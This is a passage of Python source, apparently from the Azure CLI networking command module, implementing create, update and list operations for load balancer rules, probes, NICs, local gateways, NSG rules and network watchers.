lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
    # Avoid breaking when backend_address_pool_name is None but backend_pools_name is provided.
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
        # Otherwise the service responds with the error (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue):
        # BackendAddressPool and BackendAddressPools[] in a LoadBalancingRule cannot be set at the same time with different values.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
    # To keep backward compatibility when bumping the API version from '2020-11-01' to '2021-02-01'.
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
        # Otherwise the service responds with the error (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue):
        # BackendAddressPool and BackendAddressPools[] in a LoadBalancingRule cannot be set at the same time with different values.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range; please provide a valid index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
        raise UnrecognizedArgumentError(f'{index} is out of range; please provide a valid index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
            instance.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address, peer_weight=peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
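# Note on _validate_bgp_peering: when BGP settings already exist, only the parameters that were
# passed are updated; when they do not exist yet, an ASN is required to create them from scratch.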
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
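# Note on create_nic: the NIC is created with a single IP configuration named 'ipconfig1'; its
# allocation method is 'Static' when a private IP address is supplied and 'Dynamic' otherwise.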
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
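# Note on create_nic_ip_config: when an IPv4 configuration is added without an explicit subnet,
# the subnet of the NIC's current primary IP configuration is reused, and make_primary demotes
# every existing configuration before marking the new one as primary.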
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
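# Note on set_nic_ip_config: empty-string arguments act as "clear" markers: '' for the private IP
# address switches the configuration back to dynamic allocation, and '' (or ['']) for the subnet,
# public IP, backend pool, NAT rule and application security group arguments detaches the
# corresponding resources.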
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
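# Example for _create_singular_or_plural_property (hypothetical values): a single value such as
# '10.0.0.0/24' populates 'source_address_prefix' and clears the plural field, while a list like
# ['10.0.0.0/24', '10.0.1.0/24'] populates 'source_address_prefixes' instead.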
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
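# Note on _create_network_watchers: watchers enabled through this helper follow the
# '<location>-watcher' naming convention in the given resource group.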
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
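# Note on configure_network_watcher: when 'enabled' is omitted only the existing watchers are
# re-tagged; when it is true, watchers are additionally created for regions that do not have one
# yet; when it is false, the watchers for the requested regions are deleted (tags are rejected in
# that case).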
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
